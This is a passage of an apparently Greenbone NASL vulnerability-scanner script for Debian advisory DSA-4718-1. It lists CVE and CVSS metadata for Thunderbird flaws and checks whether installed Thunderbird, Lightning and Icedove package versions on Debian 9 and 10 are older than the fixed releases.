script_oid(\"1.3.6.1.4.1.25623.1.0.704718\");\n script_version(\"2020-07-16T09:26:29+0000\");\n script_cve_id(\"CVE-2020-12417\", \"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12421\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 09:26:29 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-07 03:00:10 +0000 (Tue, 07 Jul 2020)\");\n script_name(\"Debian: Security Advisory for thunderbird (DSA-4718-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(10|9)\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4718.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4718-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the DSA-4718-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security issues have been found in Thunderbird which could\nresult in denial of service or potentially the execution of arbitrary\ncode.\");\n\n script_tag(name:\"affected\", value:\"'thunderbird' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 1:68.10.0-1~deb9u1.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 1:68.10.0-1~deb10u1.\n\nWe recommend that you upgrade your thunderbird packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ar\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ast\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-be\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bg\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-br\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ca\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cs\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cy\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-da\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-de\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-dsb\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-el\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-en-gb\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-ar\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-es\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-et\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-eu\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fi\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fr\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fy-nl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ga-ie\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gd\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-he\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hr\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hsb\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hu\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hy-am\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-id\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-is\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-it\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ja\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-kab\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-kk\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ko\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-lt\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ms\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nb-no\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nn-no\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-br\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-pt\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-rm\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ro\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ru\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-si\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sk\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sq\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sr\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sv-se\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-tr\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-uk\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-vi\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-cn\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-tw\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-all\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ar\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ast\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-be\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bg\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-br\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ca\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-cs\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-cy\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-da\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-de\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-dsb\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-el\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-en-gb\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-ar\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-es\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-et\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-eu\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fi\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fr\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fy-nl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ga-ie\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gd\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-he\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hr\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hsb\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hu\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hy-am\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-id\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-is\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-it\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ja\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-kab\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-kk\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ko\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-lt\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ms\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nb-no\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nn-no\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-br\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-pt\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-rm\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ro\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ru\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-si\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sk\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sl\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sq\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sr\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sv-se\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-tr\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-uk\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-vi\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-cn\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-tw\", ver:\"1:68.10.0-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-all\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ar\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ast\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-be\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-bg\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-bn-bd\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-br\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ca\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-cs\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-da\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-de\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-dsb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-el\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-en-gb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-es-ar\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-es-es\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-et\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-eu\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fi\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fy-nl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ga-ie\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-gd\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-gl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-he\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hsb\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hu\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hy-am\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-id\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-is\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-it\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ja\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-kab\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ko\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-lt\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nb-no\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nn-no\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pa-in\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pt-br\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pt-pt\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-rm\", ver:\"1:68.10.0-1~deb9u1\", 